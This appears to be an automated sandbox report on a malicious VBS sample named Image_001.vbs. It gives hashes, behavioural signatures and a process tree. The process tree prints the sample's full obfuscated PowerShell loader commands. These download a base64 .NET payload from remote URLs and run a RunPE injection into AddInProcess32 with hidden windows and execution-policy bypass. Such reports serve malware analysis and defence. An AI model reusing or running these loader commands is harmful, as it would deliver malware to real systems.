Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-09-2024 05:18
Static task
static1
Behavioral task
behavioral1
Sample
Image_001.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Image_001.vbs
Resource
win10v2004-20240802-en
General
-
Target
Image_001.vbs
-
Size
507KB
-
MD5
369b2913abd7a1e2ecfeea185e737e61
-
SHA1
eb9431fc12b373c216e2c89af2cfdafdc5dae727
-
SHA256
8264386f0b6a0e9b2aa5f908dc3909f4b8a61b619edb269baf56bf7112ae100e
-
SHA512
e6e02f36641a087c1e437885c1b432e325f6b805ba371093302092912065515efe090121ea54f432ea6e23c466a44635c426efbaad2268cf03c251b0657f8f9b
-
SSDEEP
12288:bsD8YhlqjFf0pIWLNvd5/iaPr4/Is0en9sAWxihGmxLyKSHPh72RwsZIohgrVVMA:jcj6whXoTMA0t
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2668 powershell.exe 4 2668 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2664 powershell.exe 2668 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2664 powershell.exe 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2664 2736 WScript.exe 30 PID 2736 wrote to memory of 2664 2736 WScript.exe 30 PID 2736 wrote to memory of 2664 2736 WScript.exe 30 PID 2664 wrote to memory of 2668 2664 powershell.exe 32 PID 2664 wrote to memory of 2668 2664 powershell.exe 32 PID 2664 wrote to memory of 2668 2664 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Image_001.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzB9dXJsJysnID0gJysneycrJzJ9aCcrJ3R0JysncCcrJ3MnKyc6JysnLy9pJysnYTYwMDEwMC51cy5hcmNoJysnaScrJ3YnKydlLm9yZy8nKycyJysnNC9pdGVtJysncycrJy9kZXRhaC1uJysnb3RlLXYnKycvRGV0YWhOb3RlVi50eHR7Mn0nKyc7ezAnKyd9YmFzZScrJzYnKyc0QycrJ29uJysndGVudCA9IChOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZScrJ24nKyd0KS5EJysnb3dubG8nKydhZFMnKyd0JysncmknKyduJysnZyh7JysnMH11cmwnKycpOycrJ3swfWJpbmFyeUNvbnRlbnQgJysnPSBbJysnU3lzJysndCcrJ2VtLkNvbnZlcnQnKyddOicrJzpGcm8nKydtQmFzJysnZTY0UycrJ3RyaW5nJysnKHswfWInKydhc2U2NENvbnQnKydlbnQpO3swfWFzc2VtYmx5ID0nKycgW1InKydlJysnZicrJ2xlY3RpbycrJ24uQXNzZW1ibHldOjonKydMb2FkKHswJysnfWInKydpbmFyeScrJ0NvbnRlbnQpO3swfXQnKyd5cGUgPSB7MCcrJ31hc3NlbWInKydseS5HZXRUeXBlKHsyfVJ1blBFLicrJ0hvbWV7Mn0pO3snKycwfScrJ21ldGhvZCA9JysnICcrJ3swfXR5JysncCcrJ2UuJysnR2UnKyd0TWUnKyd0aG9kJysnKCcrJ3snKycyfVYnKydBJysnSXsyfSk7eycrJzAnKyd9JysnbWUnKyd0aG9kLkludm8nKydrZSgnKyd7JysnMH1uJysndWxsLCBbb2JqZWN0WycrJ11dQCgnKyd7JysnMn01NScrJ2JhYycrJzA5MTgxZWUtNzAnKyc2Yi0nKydlMTA0LTJlMCcrJzItMjZiZjk2NicrJ2YnKyc9JysnbmUnKydrb3QnKycmYWlkZScrJ209JysndGxhP3R4dC5uaUInKycvJysnby9tb2MudG9wcycrJ3BwJysnYS4zMicrJ2UzNS15dGljLXInKydlYnknKydjL2IvMHYvbW9jLicrJ3NpcGFlbGdvJysnb2cuJysnZWdhcm8nKyd0c2VzJysnYWJlcmlmLy86c3B0dGh7Mn0gJysnLCB7Mn0nKycxezJ9ICwgJysnezJ9QzonKyd7MX1QJysncm9ncmFtRGF0YXsnKycxfXsyfSAsIHsyfWInKydhcnVydXJ1c3syfScrJyx7Mn1BJysnZGRJblByb2Nlc3MzMnsyfSwnKyd7Mn0nKyd7JysnMn0pKScpICAtRltjaGFyXTM2LFtjaGFyXTkyLFtjaGFyXTM5KSB8LiggJFNIZWxsaWRbMV0rJFNoZUxMSWRbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0}url'+' = '+'{'+'2}h'+'tt'+'p'+'s'+':'+'//i'+'a600100.us.arch'+'i'+'v'+'e.org/'+'2'+'4/item'+'s'+'/detah-n'+'ote-v'+'/DetahNoteV.txt{2}'+';{0'+'}base'+'6'+'4C'+'on'+'tent = (Ne'+'w-Object System.Net.WebClie'+'n'+'t).D'+'ownlo'+'adS'+'t'+'ri'+'n'+'g({'+'0}url'+');'+'{0}binaryContent '+'= ['+'Sys'+'t'+'em.Convert'+']:'+':Fro'+'mBas'+'e64S'+'tring'+'({0}b'+'ase64Cont'+'ent);{0}assembly ='+' [R'+'e'+'f'+'lectio'+'n.Assembly]::'+'Load({0'+'}b'+'inary'+'Content);{0}t'+'ype = {0'+'}assemb'+'ly.GetType({2}RunPE.'+'Home{2});{'+'0}'+'method ='+' '+'{0}ty'+'p'+'e.'+'Ge'+'tMe'+'thod'+'('+'{'+'2}V'+'A'+'I{2});{'+'0'+'}'+'me'+'thod.Invo'+'ke('+'{'+'0}n'+'ull, [object['+']]@('+'{'+'2}55'+'bac'+'09181ee-70'+'6b-'+'e104-2e0'+'2-26bf966'+'f'+'='+'ne'+'kot'+'&aide'+'m='+'tla?txt.niB'+'/'+'o/moc.tops'+'pp'+'a.32'+'e35-ytic-r'+'eby'+'c/b/0v/moc.'+'sipaelgo'+'og.'+'egaro'+'tses'+'aberif//:sptth{2} '+', {2}'+'1{2} , '+'{2}C:'+'{1}P'+'rogramData{'+'1}{2} , {2}b'+'arururus{2}'+',{2}A'+'ddInProcess32{2},'+'{2}'+'{'+'2}))') -F[char]36,[char]92,[char]39) |.( $SHellid[1]+$SheLLId[13]+'x')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9SEOPHQAZTG348V7N5ZC.temp
Filesize7KB
MD5eddcbf20bda4eeae006d3e8b36dd74bb
SHA161b0c4f9a850c757faf1ebe76a515804c7a1d86e
SHA25634c0e31f80f50a3ccf2e28e6ba9a30c64bea8e0004288206648bf5273ee690f1
SHA5120175c437ccaa9283ebc247f60318dd44dab595ad9322e5eab1de788400b1616786d77306dea22d7f3924d77ca0a3ca872c5c824ed59bdc2ef6bb88a4303fef0b